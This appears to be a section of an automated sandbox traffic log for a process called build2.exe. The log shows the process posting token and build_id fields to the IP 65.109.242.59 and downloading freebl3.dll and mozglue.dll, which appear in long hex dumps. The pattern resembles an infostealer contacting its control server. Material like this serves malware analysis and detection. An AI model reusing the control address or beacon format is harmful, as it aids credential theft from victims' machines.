                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.44979265.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:07 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBK
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 437
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:07 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------AFBKKFBAEGDHJJJJKFBKCont
                                                                                              2024-05-25 19:30:08 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:08 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.44979365.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:09 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCF
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 437
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:09 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------JJJJKEHCAKFBFHJKEHCFCont
                                                                                              2024-05-25 19:30:10 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:30:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2ok0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.44979465.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:10 UTC173OUTGET /freebl3.dll HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:10 UTC246INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:10 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 685392
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              Connection: close
                                                                                              ETag: "6315a9f4-a7550"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-25 19:30:10 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                              2024-05-25 19:30:10 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                              Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                              2024-05-25 19:30:10 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                              Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                              2024-05-25 19:30:11 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                              Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                              2024-05-25 19:30:11 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                              Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                              2024-05-25 19:30:11 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                              Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                              2024-05-25 19:30:11 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                              Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                              2024-05-25 19:30:11 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                              Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                              2024-05-25 19:30:11 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                              Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                              2024-05-25 19:30:11 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                              Data Ascii: 0<48%8A)$(


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.44979565.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:30:13 UTC173OUTGET /mozglue.dll HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:30:13 UTC246INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:30:13 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 608080
                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                              Connection: close
                                                                                              ETag: "6315a9f4-94750"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-25 19:30:13 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                              2024-05-25 19:30:13 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                              Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                              2024-05-25 19:30:13 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                              Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                              2024-05-25 19:30:13 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                              Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                              2024-05-25 19:30:13 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                              Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                              2024-05-25 19:30:13 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                              Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
